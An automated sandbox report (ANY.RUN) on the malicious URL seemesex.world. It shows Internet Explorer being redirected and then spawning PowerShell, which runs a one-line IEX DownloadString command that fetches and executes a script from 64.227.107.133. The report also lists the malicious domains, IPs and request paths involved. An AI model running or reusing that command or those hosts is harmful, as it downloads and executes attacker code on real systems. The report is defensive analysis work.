URL:

http://seemesex.world

Full analysis: https://app.any.run/tasks/6ed3b407-889f-4165-bd04-4a9f73b46dee
Verdict: Malicious activity
Analysis date: May 30, 2020, 16:30:38
OS: Windows 10 Professional (build: 16299, 64 bit)
Indicators:
MD5:

3451C5CCAC21B0F1A09D6C59CADDD504

SHA1:

0BC6234D36BC005358BA6C8385716E381722EC24

SHA256:

A00BB74C9EDC1DC54DEE348975C5AA1E6C3734864CA39D6DC3CD5825EDC1DB5F

SSDEEP:

3:N1KNAAIA88:CSAC8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts Visual C# compiler

      • PowerShell.exe (PID: 800)

  • SUSPICIOUS

    • Executed via COM

      • FlashUtil_ActiveX.exe (PID: 1836)

    • Connects to server without host name

      • IEXPLORE.EXE (PID: 4168)

    • Executes PowerShell scripts

      • IEXPLORE.EXE (PID: 4168)

    • Reads the machine GUID from the registry

      • PowerShell.exe (PID: 800)
      • csc.exe (PID: 200)

  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 3680)

    • Creates files in the user directory

      • FlashUtil_ActiveX.exe (PID: 1836)

    • Reads the machine GUID from the registry

      • IEXPLORE.EXE (PID: 4168)
      • iexplore.exe (PID: 3680)

    • Reads the software policy settings

      • PowerShell.exe (PID: 800)

    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 4168)

    • Reads settings of System Certificates

      • PowerShell.exe (PID: 800)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
91
Monitored processes
7
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe flashutil_activex.exe no specs powershell.exe conhost.exe no specs csc.exe no specs cvtres.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
200"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.cmdline"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exePowerShell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.7.2556.0 built by: NET471REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernelbase.dll
484C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
12.00.52519.0 built by: VSWINSERVICING
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernelbase.dll
800((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>IEX (New-Object Net.WebClient).DownloadString('http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187');"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
IEXPLORE.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernelbase.dll
1836"C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe" -EmbeddingC:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Utility
Exit code:
0
Version:
29,0,0,171
Modules
Images
c:\windows\system32\macromed\flash\flashutil_activex.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3580\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exePowerShell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
3680"C:\Program Files\internet explorer\iexplore.exe" "http://seemesex.world"C:\Program Files\internet explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
11.00.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
4168"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3680 CREDAT:9474 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernelbase.dll
Total events
6 416
Read events
3 302
Write events
3 114
Delete events
0

Modification events

(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:L1WatermarkLowPart
Value:
0
(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:L1WatermarkHighPart
Value:
0
(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:NextCheckForUpdateLowDateTime
Value:
0
(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:NextCheckForUpdateHighDateTime
Value:
0
(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:NextCheckForUpdateLowDateTime
Value:
3315231540
(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:NextCheckForUpdateHighDateTime
Value:
30815903
(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(3680) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
Executable files
0
Suspicious files
2
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
800PowerShell.exeC:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_xokpeyd5.hui.ps1
MD5:
SHA256:
800PowerShell.exeC:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_1yqjz34a.nw4.psm1
MD5:
SHA256:
200csc.exeC:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP
MD5:
SHA256:
484cvtres.exeC:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp
MD5:
SHA256:
200csc.exeC:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.dll
MD5:
SHA256:
200csc.exeC:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.out
MD5:
SHA256:
3680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\UrlBlock\URL46D7.tmp
MD5:
SHA256:
4168IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\LD57I5PR\pervades_8497_11925[1].htmhtml
MD5:
SHA256:
3680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\WLJYL64M\l1[1].datbinary
MD5:
SHA256:
4168IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\FZ4P8RAN\10105_jokiest_Couldn[1].jstext
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
17
DNS requests
10
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4168
IEXPLORE.EXE
GET
302
94.130.90.228:80
http://atztds547.xyz/xn94r2398us2938u4s
DE
suspicious
4168
IEXPLORE.EXE
GET
302
148.251.72.21:80
http://seemesex.world/
DE
malicious
3680
iexplore.exe
GET
404
64.227.107.133:80
http://64.227.107.133/favicon.ico
US
suspicious
800
PowerShell.exe
GET
64.227.107.133:80
http://64.227.107.133/12018-Gaveling/9KSzP?aVVc=2797
US
suspicious
4168
IEXPLORE.EXE
GET
200
64.227.107.133:80
http://64.227.107.133/1966_04_15/Trinkums/pervades_8497_11925
US
html
4.90 Kb
suspicious
4168
IEXPLORE.EXE
GET
200
64.227.107.133:80
http://64.227.107.133/795X/10105_jokiest_Couldn?gjMJD=Fumeuse_Ankusha_mislays
US
text
28.2 Kb
suspicious
4168
IEXPLORE.EXE
POST
200
64.227.107.133:80
http://64.227.107.133/1989-05-27/Demarcate/W0p6/13110_5680?Chaliced=zxHq
US
text
7.21 Kb
suspicious
4168
IEXPLORE.EXE
POST
200
64.227.107.133:80
http://64.227.107.133/computing-Deperm/agkZId
US
text
9.88 Kb
suspicious
800
PowerShell.exe
GET
200
64.227.107.133:80
http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187
US
text
2.08 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4168
IEXPLORE.EXE
94.130.90.228:80
atztds547.xyz
Hetzner Online GmbH
DE
malicious
3680
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
4276
svchost.exe
20.191.48.196:443
settings-win-ppe.data.microsoft.com
Microsoft Corporation
US
unknown
800
PowerShell.exe
64.227.107.133:80
Peer 1 Network (USA) Inc.
US
suspicious
4168
IEXPLORE.EXE
148.251.72.21:80
seemesex.world
Hetzner Online GmbH
DE
suspicious
4168
IEXPLORE.EXE
13.80.7.77:443
urs.microsoft.com
Microsoft Corporation
NL
unknown
3680
iexplore.exe
64.227.107.133:80
Peer 1 Network (USA) Inc.
US
suspicious
3680
iexplore.exe
13.80.7.77:443
urs.microsoft.com
Microsoft Corporation
NL
unknown
4168
IEXPLORE.EXE
64.227.107.133:80
Peer 1 Network (USA) Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
seemesex.world
  • 148.251.72.21
malicious
atztds547.xyz
  • 94.130.90.228
suspicious
urs.microsoft.com
  • 13.80.7.77
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
c.urs.microsoft.com
  • 13.80.7.77
whitelisted
ieonline.microsoft.com
  • 204.79.197.200
whitelisted
nexusrules.officeapps.live.com
  • 52.109.12.18
whitelisted
self.events.data.microsoft.com
  • 52.114.158.91
whitelisted
settings-win-ppe.data.microsoft.com
  • 20.191.48.196
whitelisted
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
1940
svchost.exe
Potentially Bad Traffic
ET INFO Observed DNS Query to .world TLD
4168
IEXPLORE.EXE
Potentially Bad Traffic
ET INFO HTTP Request to Suspicious *.world Domain
4168
IEXPLORE.EXE
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
http://seemesex.world